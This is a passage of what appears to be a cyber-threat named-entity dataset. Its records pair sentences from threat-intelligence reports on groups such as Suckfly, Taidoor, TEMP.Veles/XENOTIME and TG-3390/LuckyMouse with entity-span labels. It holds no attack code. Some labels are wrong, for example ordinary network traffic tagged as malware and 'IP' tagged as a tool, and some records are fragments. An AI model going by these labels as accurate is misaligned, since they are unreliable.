deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable .", "spans": {"TOOL: ProjectSauron": [[39, 52]], "TOOL: malicious modules": [[62, 79]]}, "info": {"id": "dnrti_train_001255", "source": "dnrti_train"}} {"text": "The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods .", "spans": {"TOOL: ProjectSauron": [[24, 37]]}, "info": {"id": "dnrti_train_001256", "source": "dnrti_train"}} {"text": "In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network .", "spans": {"ORGANIZATION: Kaspersky Lab": [[20, 33]], "MALWARE: anomalous network traffic": [[78, 103]], "ORGANIZATION: government organization": [[109, 132]]}, "info": {"id": "dnrti_train_001257", "source": "dnrti_train"}} {"text": "Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks .", "spans": {"TOOL: ProjectSauron modules": [[10, 31]]}, "info": {"id": "dnrti_train_001259", "source": "dnrti_train"}} {"text": "activity originated from three separate IP addresses , all located in Chengdu , China .", "spans": {}, "info": {"id": "dnrti_train_001260", "source": "dnrti_train"}} {"text": "stolen certificates being used maliciously occurred in early 2014 .", "spans": {}, "info": {"id": "dnrti_train_001262", "source": "dnrti_train"}} {"text": "Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": 
{"VULNERABILITY: Microsoft Windows OLE Remote Code Execution Vulnerability": [[87, 144]], "VULNERABILITY: CVE-2014-6332": [[147, 160]]}, "info": {"id": "dnrti_train_001264", "source": "dnrti_train"}} {"text": "The threat then executes \" svchost.exe \" .", "spans": {"TOOL: svchost.exe": [[27, 38]]}, "info": {"id": "dnrti_train_001265", "source": "dnrti_train"}} {"text": "these attacks were part of a planned operation against specific targets in India .", "spans": {}, "info": {"id": "dnrti_train_001273", "source": "dnrti_train"}} {"text": "While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"MALWARE: Backdoor.Nidiran": [[109, 125]]}, "info": {"id": "dnrti_train_001274", "source": "dnrti_train"}} {"text": "In 2015 , Suckfly conducted a multistage attack .", "spans": {}, "info": {"id": "dnrti_train_001280", "source": "dnrti_train"}} {"text": "Suckfly conducted a multistage attack between April 22 and May 4 .", "spans": {}, "info": {"id": "dnrti_train_001281", "source": "dnrti_train"}} {"text": "Suckfly conducted a multistage attack against an e-commerce organization .", "spans": {"ORGANIZATION: e-commerce organization": [[49, 72]]}, "info": {"id": "dnrti_train_001283", "source": "dnrti_train"}} {"text": "Suckfly conducted a multistage attack against an e-commerce organization based in India .", "spans": {"ORGANIZATION: e-commerce organization": [[49, 72]]}, "info": {"id": "dnrti_train_001284", "source": "dnrti_train"}} {"text": "Using data collected from the Trend Micro™ Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers .", "spans": {"ORGANIZATION: Trend Micro™ Smart Protection Network": [[30, 67]], "TOOL: Taidoor C&C servers": [[135, 154]]}, "info": {"id": "dnrti_train_001299", "source": "dnrti_train"}} {"text": "The 
Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 .", "spans": {}, "info": {"id": "dnrti_train_001300", "source": "dnrti_train"}} {"text": "Taidoor spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues .", "spans": {}, "info": {"id": "dnrti_train_001301", "source": "dnrti_train"}} {"text": "Despite some exceptions , the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments .", "spans": {"TOOL: IP": [[68, 70]]}, "info": {"id": "dnrti_train_001302", "source": "dnrti_train"}} {"text": "One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government .", "spans": {}, "info": {"id": "dnrti_train_001303", "source": "dnrti_train"}} {"text": "Suckfly targeted one of India 's largest e-commerce companies , a major Indian shipping company , one of India 's largest financial organizations , and an IT firm that provides support for India 's largest stock exchange .", "spans": {"ORGANIZATION: e-commerce companies": [[41, 61]], "ORGANIZATION: shipping company": [[79, 95]], "ORGANIZATION: financial organizations": [[122, 145]], "ORGANIZATION: IT firm": [[155, 162]]}, "info": {"id": "dnrti_train_001304", "source": "dnrti_train"}} {"text": "Taidoor actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": {}, "info": {"id": "dnrti_train_001306", "source": "dnrti_train"}} {"text": "The attackers actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": {}, "info": {"id": "dnrti_train_001307", "source": "dnrti_train"}} {"text": "As part of their social engineering ploy , the Taidoor attackers attach a decoy document to their emails that , when opened , displays the contents of a legitimate document but executes a 
malicious payload in the background .", "spans": {}, "info": {"id": "dnrti_train_001308", "source": "dnrti_train"}} {"text": "Sometimes , however , certain samples made use of domain names for HTTP communication .", "spans": {}, "info": {"id": "dnrti_train_001309", "source": "dnrti_train"}} {"text": "Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible .", "spans": {"TOOL: Taidoor malware": [[41, 56]]}, "info": {"id": "dnrti_train_001310", "source": "dnrti_train"}} {"text": "The ultimate objective of targeted attacks is to acquire sensitive data .", "spans": {}, "info": {"id": "dnrti_train_001311", "source": "dnrti_train"}} {"text": "In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown .", "spans": {"ORGANIZATION: FireEye": [[19, 26]], "TOOL: TRITON": [[117, 123]]}, "info": {"id": "dnrti_train_001312", "source": "dnrti_train"}} {"text": "In our most recent analysis , we attributed the intrusion activity that led to the deployment of TRITON to a Russian government-owned technical research institute in Moscow .", "spans": {"TOOL: TRITON": [[97, 103]]}, "info": {"id": "dnrti_train_001313", "source": "dnrti_train"}} {"text": "For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence .", "spans": {"TOOL: TRITON": [[30, 36]], "ORGANIZATION: FireEye Cyber Threat Intelligence": [[87, 120]]}, "info": {"id": "dnrti_train_001314", "source": "dnrti_train"}} {"text": "During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware .", "spans": {"TOOL: ICS malware": [[151, 162]]}, "info": {"id": "dnrti_train_001315", "source": 
"dnrti_train"}} {"text": "Additionally , the actor possibly gained a foothold on other target networks—beyond the two intrusions discussed in this post – using similar strategies .", "spans": {}, "info": {"id": "dnrti_train_001317", "source": "dnrti_train"}} {"text": "There is often a singular focus from the security community on ICS malware largely due to its novel nature and the fact that there are very few examples found in the wild .", "spans": {"ORGANIZATION: security community": [[41, 59]], "TOOL: ICS malware": [[63, 74]]}, "info": {"id": "dnrti_train_001318", "source": "dnrti_train"}} {"text": "ЦНИИХМ ) , a Russian government-owned technical research institution located in Moscow .", "spans": {"ORGANIZATION: research institution": [[48, 68]]}, "info": {"id": "dnrti_train_001319", "source": "dnrti_train"}} {"text": "TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant .", "spans": {"THREAT_ACTOR: TEMP.Veles'": [[0, 11]], "TOOL: PowerShell-based tool": [[66, 87]], "TOOL: WMImplant": [[90, 99]]}, "info": {"id": "dnrti_train_001322", "source": "dnrti_train"}} {"text": "We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target 's network .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[58, 68]]}, "info": {"id": "dnrti_train_001325", "source": "dnrti_train"}} {"text": "CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": {"THREAT_ACTOR: CNIIHM": [[0, 6]], "THREAT_ACTOR: TEMP.Veles": [[102, 112]]}, "info": {"id": "dnrti_train_001328", "source": "dnrti_train"}} {"text": "XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]], "ORGANIZATION: Dragos": [[50, 56]], "ORGANIZATION: FireEye": [[61, 68]], "TOOL: 
TRISIS": [[98, 104]]}, "info": {"id": "dnrti_train_001330", "source": "dnrti_train"}} {"text": "XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]], "TOOL: credential capture and replay": [[14, 43]], "TOOL: PSExec": [[126, 132]]}, "info": {"id": "dnrti_train_001332", "source": "dnrti_train"}} {"text": "Dragos' data indicates XENOTIME remains active .", "spans": {"ORGANIZATION: Dragos'": [[0, 7]], "THREAT_ACTOR: XENOTIME": [[23, 31]]}, "info": {"id": "dnrti_train_001334", "source": "dnrti_train"}} {"text": "TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[0, 10]], "TOOL: custom malware": [[21, 35]], "TOOL: tailormade credential gathering tools": [[50, 87]]}, "info": {"id": "dnrti_train_001335", "source": "dnrti_train"}} {"text": "Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": {"ORGANIZATION: Dragos'": [[14, 21]], "TOOL: TRISIS": [[38, 44]]}, "info": {"id": "dnrti_train_001336", "source": "dnrti_train"}} {"text": "This seems confusing as FireEye earlier publicly declared the TRITON as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": {"ORGANIZATION: FireEye": [[24, 31]], "TOOL: TRITON": [[62, 68]], "ORGANIZATION: research institution": [[112, 132]], "THREAT_ACTOR: TEMP.Veles": [[158, 168]]}, "info": {"id": "dnrti_train_001342", "source": "dnrti_train"}} {"text": "This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": {"ORGANIZATION: FireEye": 
[[24, 31]], "TOOL: TRITON": [[64, 70]], "ORGANIZATION: research institution": [[122, 142]], "THREAT_ACTOR: TEMP.Veles": [[168, 178]]}, "info": {"id": "dnrti_train_001343", "source": "dnrti_train"}} {"text": "FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: TRITON": [[104, 110]], "TOOL: TRITON/TRISIS malware": [[148, 169]]}, "info": {"id": "dnrti_train_001345", "source": "dnrti_train"}} {"text": "Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media .", "spans": {"TOOL: TRITON/TRISIS": [[61, 74]], "ORGANIZATION: Dragos": [[145, 151]], "ORGANIZATION: FireEye": [[236, 243]]}, "info": {"id": "dnrti_train_001346", "source": "dnrti_train"}} {"text": "Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: FireEye": [[55, 62]], "THREAT_ACTOR: TEMP.Veles": [[130, 140]], "TOOL: TRITON": [[188, 194]], "ORGANIZATION: Dragos": [[211, 217]], "THREAT_ACTOR: XENOTIME": [[294, 302]]}, "info": {"id": "dnrti_train_001347", "source": "dnrti_train"}} {"text": "Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[83, 91]]}, "info": {"id": "dnrti_train_001348", "source": "dnrti_train"}} {"text": "Aside from the competitive vendor naming landscape ( which I 
am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology .", "spans": {"ORGANIZATION: FireEye": [[241, 248]], "ORGANIZATION: Dragos'": [[253, 260]], "TOOL: TRITON": [[294, 300]]}, "info": {"id": "dnrti_train_001349", "source": "dnrti_train"}} {"text": "In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[38, 48], [127, 137]], "ORGANIZATION: FireEye": [[51, 58]], "TOOL: TRITON": [[160, 166]]}, "info": {"id": "dnrti_train_001350", "source": "dnrti_train"}} {"text": "My understanding is FireEye labels entities where definitive attribution is not yet possible with the \" TEMP \" moniker ( hence , TEMP.Veles ) – yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": {"ORGANIZATION: FireEye": [[20, 27], [161, 168]], "THREAT_ACTOR: TEMP.Veles": [[129, 139]]}, "info": {"id": "dnrti_train_001351", "source": "dnrti_train"}} {"text": "Of note , this methodology of naming abstracts away the \" who \" element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": {"THREAT_ACTOR: XENOTIME": [[74, 82]], "ORGANIZATION: research institution": [[142, 162]]}, "info": {"id": "dnrti_train_001353", "source": "dnrti_train"}} {"text": "Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \" the TRITON actor \" ) describe the same 
phenomena , yet at the same time appear different .", "spans": {"THREAT_ACTOR: XENOTIME": [[113, 121]], "THREAT_ACTOR: TEMP.Veles": [[126, 136]], "TOOL: TRITON": [[174, 180]]}, "info": {"id": "dnrti_train_001354", "source": "dnrti_train"}} {"text": "CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: Threat Group-1314": [[68, 85]]}, "info": {"id": "dnrti_train_001356", "source": "dnrti_train"}} {"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": {"THREAT_ACTOR: TG-3390": [[26, 33]], "TOOL: SWCs": [[71, 75]]}, "info": {"id": "dnrti_train_001364", "source": "dnrti_train"}} {"text": "After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims .", "spans": {"THREAT_ACTOR: TG-3390": [[31, 38]], "TOOL: HTTPBrowser backdoor": [[52, 72]]}, "info": {"id": "dnrti_train_001366", "source": "dnrti_train"}} {"text": "Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": {"ORGANIZATION: CTU": [[11, 14]], "THREAT_ACTOR: Threat Group-1314": [[68, 85]]}, "info": {"id": "dnrti_train_001371", "source": "dnrti_train"}} {"text": "CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. 
military capability , or both .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: Group-3390": [[41, 51]]}, "info": {"id": "dnrti_train_001372", "source": "dnrti_train"}} {"text": "Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions .", "spans": {"ORGANIZATION: CTU": [[41, 44]], "THREAT_ACTOR: TG-3390": [[82, 89]]}, "info": {"id": "dnrti_train_001380", "source": "dnrti_train"}} {"text": "TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]]}, "info": {"id": "dnrti_train_001384", "source": "dnrti_train"}} {"text": "Using a U.S.-based C2 infrastructure ( see Figure 7 ) to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": {"TOOL: U.S.-based C2 infrastructure": [[8, 36]], "THREAT_ACTOR: TG-3390": [[94, 101]]}, "info": {"id": "dnrti_train_001385", "source": "dnrti_train"}} {"text": "One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file .", "spans": {"ORGANIZATION: CTU": [[31, 34]], "TOOL: PDF file": [[70, 78]], "TOOL: HTTPBrowser installer": [[145, 166]]}, "info": {"id": "dnrti_train_001388", "source": "dnrti_train"}} {"text": "TG-3390 sends spearphishing emails with ZIP archive attachments .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]]}, "info": {"id": "dnrti_train_001390", "source": "dnrti_train"}} {"text": "CTU researchers have observed TG-3390 compromising a target organization 's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": 
[[30, 37]]}, "info": {"id": "dnrti_train_001391", "source": "dnrti_train"}} {"text": "In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"THREAT_ACTOR: TG-3390": [[16, 23]], "VULNERABILITY: CVE-2011-3544": [[38, 51]], "TOOL: HTTPBrowser backdoor": [[119, 139]], "VULNERABILITY: CVE-2010-0738": [[146, 159]], "TOOL: JBoss": [[181, 186]]}, "info": {"id": "dnrti_train_001393", "source": "dnrti_train"}} {"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"VULNERABILITY: CVE-2011-3544": [[49, 62]], "TOOL: HTTPBrowser backdoor": [[130, 150]], "VULNERABILITY: CVE-2010-0738": [[157, 170]], "TOOL: JBoss": [[192, 197]]}, "info": {"id": "dnrti_train_001395", "source": "dnrti_train"}} {"text": "CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: Threat Group-3390": [[34, 51]], "ORGANIZATION: Kaspersky": [[73, 82]]}, "info": {"id": "dnrti_train_001397", "source": "dnrti_train"}} {"text": "The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system .", "spans": {"TOOL: PlugX": [[50, 55]], "TOOL: HTTPBrowser": [[60, 71]]}, "info": {"id": "dnrti_train_001398", "source": "dnrti_train"}} {"text": "CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[34, 41]], 
"ORGANIZATION: Kaspersky": [[63, 72]]}, "info": {"id": "dnrti_train_001399", "source": "dnrti_train"}} {"text": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": {"TOOL: OwaAuth web shell": [[7, 24]], "THREAT_ACTOR: TG-3390": [[104, 111]]}, "info": {"id": "dnrti_train_001405", "source": "dnrti_train"}} {"text": "After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name .", "spans": {"TOOL: Baidu search engine": [[89, 108]]}, "info": {"id": "dnrti_train_001406", "source": "dnrti_train"}} {"text": "CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "dnrti_train_001407", "source": "dnrti_train"}} {"text": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HTTPBrowser or PlugX .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: ASPXTool web shells": [[51, 70]], "TOOL: HTTPBrowser": [[173, 184]], "TOOL: PlugX": [[188, 193]]}, "info": {"id": "dnrti_train_001408", "source": "dnrti_train"}} {"text": "Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication .", "spans": {}, "info": {"id": "dnrti_train_001410", "source": "dnrti_train"}} {"text": "In 2015 , the SecureWorks® Counter Threat Unit™ ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU™ analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[14, 47]], "ORGANIZATION: CTU": [[50, 53]], 
"THREAT_ACTOR: TG-3390": [[130, 137]], "ORGANIZATION: CTU™": [[148, 152]]}, "info": {"id": "dnrti_train_001411", "source": "dnrti_train"}} {"text": "In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": {"ORGANIZATION: SecureWorks": [[14, 25]], "THREAT_ACTOR: TG-3390": [[86, 93]], "ORGANIZATION: CTU": [[104, 107]]}, "info": {"id": "dnrti_train_001413", "source": "dnrti_train"}} {"text": "BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": {}, "info": {"id": "dnrti_train_001414", "source": "dnrti_train"}} {"text": "Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks .", "spans": {"ORGANIZATION: CTU": [[46, 49]], "ORGANIZATION: political": [[115, 124]], "ORGANIZATION: defense organization": [[129, 149]]}, "info": {"id": "dnrti_train_001415", "source": "dnrti_train"}} {"text": "this SWC was used to specifically target Turkish .", "spans": {"TOOL: SWC": [[5, 8]]}, "info": {"id": "dnrti_train_001416", "source": "dnrti_train"}} {"text": "this SWC was used to specifically target Turkish goverment .", "spans": {"TOOL: SWC": [[5, 8]]}, "info": {"id": "dnrti_train_001419", "source": "dnrti_train"}} {"text": "Since that analysis , CTU researchers have observed multiple BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": {"ORGANIZATION: CTU": [[22, 25]]}, "info": {"id": "dnrti_train_001420", "source": "dnrti_train"}} {"text": "this SWC was used to specifically target Turkish banking .", "spans": {"TOOL: SWC": [[5, 8]]}, "info": {"id": "dnrti_train_001421", "source": "dnrti_train"}} {"text": "this SWC was used to specifically target Turkish academic networks .", "spans": {"TOOL: SWC": [[5, 8]]}, 
"info": {"id": "dnrti_train_001422", "source": "dnrti_train"}} {"text": "BRONZE UNION has consistently demonstrated the capability to conduct successful large-scale intrusions against high-profile networks and systems .", "spans": {}, "info": {"id": "dnrti_train_001423", "source": "dnrti_train"}} {"text": "The threat actors appear to be able to create and leverage multiple SWCs in parallel .", "spans": {"TOOL: SWCs": [[68, 72]]}, "info": {"id": "dnrti_train_001424", "source": "dnrti_train"}} {"text": "In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": {"ORGANIZATION: CTU": [[25, 28]], "MALWARE: s.txt": [[65, 70]]}, "info": {"id": "dnrti_train_001425", "source": "dnrti_train"}} {"text": "BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance .", "spans": {}, "info": {"id": "dnrti_train_001426", "source": "dnrti_train"}} {"text": "BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure .", "spans": {}, "info": {"id": "dnrti_train_001427", "source": "dnrti_train"}} {"text": "This script relays commands and output between the controller and the system .", "spans": {}, "info": {"id": "dnrti_train_001428", "source": "dnrti_train"}} {"text": "The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) .", "spans": {}, "info": {"id": "dnrti_train_001429", "source": "dnrti_train"}} {"text": "In 2016 , CTU researchers observed the group using native system .", "spans": {"ORGANIZATION: CTU": [[10, 13]]}, "info": {"id": "dnrti_train_001430", "source": "dnrti_train"}} {"text": "In March 2018 we detected an ongoing campaign .", "spans": {}, "info": 
{"id": "dnrti_train_001431", "source": "dnrti_train"}} {"text": "TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": {}, "info": {"id": "dnrti_train_001432", "source": "dnrti_train"}} {"text": "As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace .", "spans": {}, "info": {"id": "dnrti_train_001433", "source": "dnrti_train"}} {"text": "we detected an ongoing campaign targeting a national data center .", "spans": {}, "info": {"id": "dnrti_train_001434", "source": "dnrti_train"}} {"text": "The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool ( RAT ) .", "spans": {"TOOL: HyperBro Trojan": [[23, 38]], "TOOL: RAT": [[98, 101]]}, "info": {"id": "dnrti_train_001435", "source": "dnrti_train"}} {"text": "we detected an ongoing campaign targeting a national data center in Central Asia .", "spans": {}, "info": {"id": "dnrti_train_001436", "source": "dnrti_train"}} {"text": "The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors .", "spans": {"TOOL: HyperBro Trojan": [[47, 62]]}, "info": {"id": "dnrti_train_001437", "source": "dnrti_train"}} {"text": "Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) .", "spans": {"THREAT_ACTOR: LuckyMouse": [[61, 71]], "THREAT_ACTOR: EmissaryPanda": [[111, 124]], "THREAT_ACTOR: APT27": [[129, 134]]}, "info": {"id": "dnrti_train_001438", "source": "dnrti_train"}} {"text": "It's possible TG-3390 used a waterhole to infect data center employees .", "spans": {"THREAT_ACTOR: TG-3390": [[14, 21]], "ORGANIZATION: data center employees": [[49, 70]]}, "info": {"id": "dnrti_train_001439", "source": "dnrti_train"}} {"text": "Even when we observed LuckyMouse using weaponized 
documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack .", "spans": {"VULNERABILITY: CVE-2017-11882": [[65, 79]], "TOOL: Microsoft Office Equation Editor": [[82, 114]]}, "info": {"id": "dnrti_train_001440", "source": "dnrti_train"}} {"text": "We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests .", "spans": {"TOOL: router": [[16, 22]]}, "info": {"id": "dnrti_train_001441", "source": "dnrti_train"}} {"text": "In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": {"ORGANIZATION: Wikileaks": [[16, 25]], "TOOL: Mikrotik": [[71, 79]], "TOOL: ChimayRed": [[87, 96]]}, "info": {"id": "dnrti_train_001442", "source": "dnrti_train"}} {"text": "There were traces of HyperBro in the infected data center from mid-November 2017 .", "spans": {"TOOL: HyperBro": [[21, 29]]}, "info": {"id": "dnrti_train_001443", "source": "dnrti_train"}} {"text": "This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology .", "spans": {}, "info": {"id": "dnrti_train_001445", "source": "dnrti_train"}} {"text": "Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups .", "spans": {"TOOL: PlugX": [[59, 64]], "TOOL: HTTPBrowser": [[72, 83]], "TOOL: RAT": [[86, 89]]}, "info": {"id": "dnrti_train_001446", "source": "dnrti_train"}} {"text": "Emissary Panda has used many ways with the most notable being the exploits from the Hacking Team leak .", "spans": {}, "info": {"id": "dnrti_train_001447", "source": "dnrti_train"}} {"text": "Emissary Panda is still active and continues to target selected organisations .", "spans": {}, "info": {"id": "dnrti_train_001448", 
"source": "dnrti_train"}} {"text": "Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks .", "spans": {"ORGANIZATION: Cybersecurity": [[0, 13]]}, "info": {"id": "dnrti_train_001449", "source": "dnrti_train"}} {"text": "The campaign is believed to be active covertly since fall 2017 .", "spans": {}, "info": {"id": "dnrti_train_001450", "source": "dnrti_train"}} {"text": "LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year .", "spans": {"THREAT_ACTOR: LuckyMouse": [[0, 10]], "THREAT_ACTOR: Iron Tiger": [[27, 37]], "THREAT_ACTOR: EmissaryPanda": [[40, 53]], "THREAT_ACTOR: APT 27": [[56, 62]], "THREAT_ACTOR: Threat Group-3390": [[67, 84]], "TOOL: Bitcoin mining malware": [[169, 191]]}, "info": {"id": "dnrti_train_001451", "source": "dnrti_train"}} {"text": "March by security researchers from Kaspersky Labs .", "spans": {"ORGANIZATION: Kaspersky Labs": [[35, 49]]}, "info": {"id": "dnrti_train_001452", "source": "dnrti_train"}} {"text": "For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network .", "spans": {"ORGANIZATION: CTU": [[33, 36]]}, "info": {"id": "dnrti_train_001453", "source": "dnrti_train"}} {"text": "The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors .", "spans": {"ORGANIZATION: defense contractors": [[186, 205]]}, "info": {"id": "dnrti_train_001454", "source": "dnrti_train"}} {"text": "attacks to a Chinese-speaking threat actor group called LuckyMouse .", "spans": {}, "info": {"id": "dnrti_train_001455", "source": 
